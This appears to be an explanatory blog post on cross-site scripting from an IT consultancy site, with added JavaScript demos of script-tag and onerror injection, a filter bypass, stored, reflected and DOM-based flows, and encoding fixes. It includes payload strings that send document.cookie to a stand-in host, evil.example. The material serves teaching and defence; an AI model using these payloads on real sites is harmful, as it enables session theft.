
What is Cross-site Scripting Attack (XSS)?

Cross-site scripting is just as possible in a vulnerable HTML5 web application as in one written for an older version of HTML, because the Same-Origin Policy treats an embedded script exactly as it always has: a script that becomes part of the page runs with that page's origin and privileges, whatever HTML version the document declares. If an attacker can get attacker-controlled markup into the content, there is no difference between HTML5 and earlier HTML. The malicious code usually arrives through form input and takes one of two forms: a <script> element, or inline JavaScript placed in an event handler attribute (for example onerror or onload). Which vector works depends on what the page's input filter lets through, and a filter that only looks for <script> is bypassed by the second form.
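The two injection vectors and the filter-bypass point above, as an added example that is not part of the original post. It models a comment renderer in Node: the vulnerable concatenation, a naive filter that only strips <script> tags, the event-handler payload that walks past that filter, and the output-encoding fix. The function names, the two payloads and the evil.example host are constructed for this illustration.

```javascript
// Added example (not from the original post): how an XSS payload reaches the
// page through a <script> element or an inline event handler, why a filter that
// only removes <script> fails, and what HTML output encoding does instead.
// Function names, payloads and the evil.example host are constructed.

// Vulnerable: untrusted text is concatenated straight into the HTML document.
function renderCommentUnsafe(comment) {
  return `<div class="comment">${comment}</div>`;
}

// A typical "fix" that only removes <script> elements. It stops the first
// vector but not inline event handlers, which need no <script> at all.
function stripScriptTags(input) {
  return input.replace(/<\s*\/?\s*script[^>]*>/gi, '');
}

function renderCommentFiltered(comment) {
  return renderCommentUnsafe(stripScriptTags(comment));
}

// Hardened: encode the characters that change meaning inside an HTML text
// node. The browser shows the payload as literal text and executes nothing.
function escapeHtml(str) {
  return String(str).replace(/[&<>"']/g, ch => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[ch]);
}

function renderCommentSafe(comment) {
  return `<div class="comment">${escapeHtml(comment)}</div>`;
}

// Crude check used by the demo: does the rendered HTML still contain markup
// that would execute script (a <script> tag or an on* event handler attribute)?
function containsActiveScript(html) {
  return /<script\b/i.test(html) || /<[a-z][^>]*\son\w+\s*=/i.test(html);
}

// Constructed payloads for the two vectors described in the text.
const SCRIPT_ELEMENT_PAYLOAD =
  '<script>document.location="https://evil.example/?c="+document.cookie</script>';
const EVENT_HANDLER_PAYLOAD =
  '<img src=x onerror="fetch(\'https://evil.example/?c=\'+document.cookie)">';

// Runs each renderer against each payload and reports whether active
// script survived. The filtered renderer stops the <script> vector only.
function demoVectors() {
  return {
    unsafeScript: containsActiveScript(renderCommentUnsafe(SCRIPT_ELEMENT_PAYLOAD)),     // true
    filteredScript: containsActiveScript(renderCommentFiltered(SCRIPT_ELEMENT_PAYLOAD)), // false
    filteredHandler: containsActiveScript(renderCommentFiltered(EVENT_HANDLER_PAYLOAD)), // true: bypass
    safeScript: containsActiveScript(renderCommentSafe(SCRIPT_ELEMENT_PAYLOAD)),         // false
    safeHandler: containsActiveScript(renderCommentSafe(EVENT_HANDLER_PAYLOAD)),         // false
  };
}

console.log(demoVectors());
```

The point of the filtered case is that a blocklist describes the attacks the author already knows about; encoding for the output context (here an HTML text node) makes the distinction unnecessary, because no untrusted character can open a tag or an attribute at all.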

  

Possible Malicious Actions

Injected JavaScript runs with the full privileges of the page's origin, and the browser places no restriction on what such code may do there. An attacker can therefore carry out a wide range of actions, such as:

  • Cookie and session hijacking (reading document.cookie or other session tokens and sending them to an attacker-controlled server)
  • Clickjacking (overlaying or rewriting page elements so that the victim's clicks do something other than intended)
  • Redirecting the visitor to an attacker-controlled site
  • Creating DoS (Denial-of-Service) and DDoS (Distributed Denial-of-Service) attacks, for example by making every victim's browser flood a target with requests
  • Scanning the internal network from the victim's browser
  • And more

  

Attacking Models

  • Type I – Persistent XSS (stored XSS): if an attacker can bypass the input validation, or can write to the database through an SQL injection flaw, the malicious content is stored on the server and delivered to every user who later views the affected page.
  • Type II – Non-Persistent XSS (reflected XSS): if the attacker can trick a user into following a crafted URL that carries the payload, the server echoes that payload back in the HTTP response and the browser executes it. Nothing is stored on the server.
  • DOM Based XSS: similar to non-persistent XSS, but the server's response does not contain the payload at all. The injection happens inside the user's browser, because the page's own client-side JavaScript reads attacker-controlled data (for example the URL fragment, which the browser never sends to the server) and writes it into a dangerous sink such as innerHTML.
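The three models above, as an added example that is not part of the original post. It shows where the payload travels in each case with a toy server and a stub browser so that it runs offline in Node: stored XSS serves the payload from a database, reflected XSS echoes it from the query string, and DOM-based XSS never puts it in the server response at all. The in-memory database, the shop.example URLs, the element stub and the function names are constructed for this illustration.

```javascript
// Added example (not from the original post): where the payload lives in
// stored, reflected and DOM-based XSS. The database, URLs, element stub and
// function names are constructed for the illustration.

const PAYLOAD = '<img src=x onerror="alert(document.cookie)">';

// --- Type I / stored: the payload is persisted, then served to every visitor.
const commentDb = [];                                  // constructed stand-in for a table
function postComment(text) { commentDb.push(text); }   // no validation, no encoding
function commentsPage() {
  return '<ul>' + commentDb.map(c => `<li>${c}</li>`).join('') + '</ul>';
}

// --- Type II / reflected: the payload rides in the request and is echoed
//     straight back in the response; nothing is stored.
function searchPage(requestUrl) {
  const q = new URL(requestUrl).searchParams.get('q') ?? '';
  return `<p>Results for: ${q}</p>`;
}

// --- DOM-based: the response is identical for every visitor and contains no
//     payload. The flaw is client-side code that reads an attacker-controlled
//     source (the URL fragment) into an HTML sink (innerHTML).
function greetingPage() {
  return '<div id="greet"></div>' +
    '<script>document.getElementById("greet").innerHTML = ' +
    'decodeURIComponent(location.hash.slice(1));</script>';
}

// Minimal stub of the element the inline script above writes to.
function makeElement() {
  return { innerHTML: '', textContent: '' };
}

// The inline script's logic, re-implemented so the stub browser can run it;
// `loc` plays the role of window.location.
function runGreetingScriptUnsafe(loc, el) {
  el.innerHTML = decodeURIComponent(loc.hash.slice(1));   // HTML sink: markup is parsed
  return el;
}

// Hardened client code: same source, text sink. The fragment is displayed
// literally and no element is created from it.
function runGreetingScriptSafe(loc, el) {
  el.textContent = decodeURIComponent(loc.hash.slice(1));
  return el;
}

function containsPayload(html) { return html.includes(PAYLOAD); }

// Plays the attacker and the victim for each model and reports where the
// payload ended up.
function demoModels() {
  // Stored: the attacker posts once; the victim loads the page later.
  postComment(PAYLOAD);
  const storedResponse = commentsPage();

  // Reflected: the victim is tricked into opening a crafted link.
  const reflectedUrl = 'https://shop.example/search?q=' + encodeURIComponent(PAYLOAD);
  const reflectedResponse = searchPage(reflectedUrl);

  // DOM-based: crafted link carries the payload in the fragment only.
  const domUrl = new URL('https://shop.example/hello#' + encodeURIComponent(PAYLOAD));
  const domResponse = greetingPage();
  const unsafeEl = runGreetingScriptUnsafe(domUrl, makeElement());
  const safeEl = runGreetingScriptSafe(domUrl, makeElement());

  return {
    storedResponseHasPayload: containsPayload(storedResponse),        // true
    reflectedResponseHasPayload: containsPayload(reflectedResponse),  // true
    domResponseHasPayload: containsPayload(domResponse),              // false
    domSinkHasPayload: containsPayload(unsafeEl.innerHTML),           // true
    safeSinkHasPayload: containsPayload(safeEl.innerHTML),            // false
    safeTextIsPayload: safeEl.textContent === PAYLOAD,                // true
  };
}

console.log(demoModels());
```

The practical consequence of the last case is that a server-side web application firewall or response scanner sees nothing wrong, because the payload sits after the # and never leaves the browser; DOM-based XSS has to be found and fixed in the client-side code, by choosing a safe sink.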

 

Injected malicious code executes inside HTML5 pages exactly as it does in any other HTML document; this is not a weakness introduced by HTML5. Once a script is part of the page, the browser runs it, including script loaded from another origin with a <script src> element, which executes in the context of the including page. The Same-Origin Policy has no way to distinguish malicious script from trusted script when both arrive as part of the same origin, so every loaded script runs with the same privileges as the page itself.

Whether the payload is an embedded script or an inline script, the browser executes it for every kind of HTML document, HTML5 and earlier versions alike. The attacker can therefore do anything the injected code asks for, within whatever the Same-Origin Policy allows that page to do.




Suncode IT Solutions

2 years ago

Nice blog!


We are an IT Solutions and Consultancy company based in Erbil, we provide a high quality web development, designing and IT consulting services . We totally fathom the customer requirements and assist them to accomplish their ultimate business objectives.

 

Contact Info

  • No 144, Dar u Asn (Hadid u Khashab) Ave. Shoresh, Erbil, Iraqi Kurdistan
  • +964 750 555 1 999
  • info@suncode.co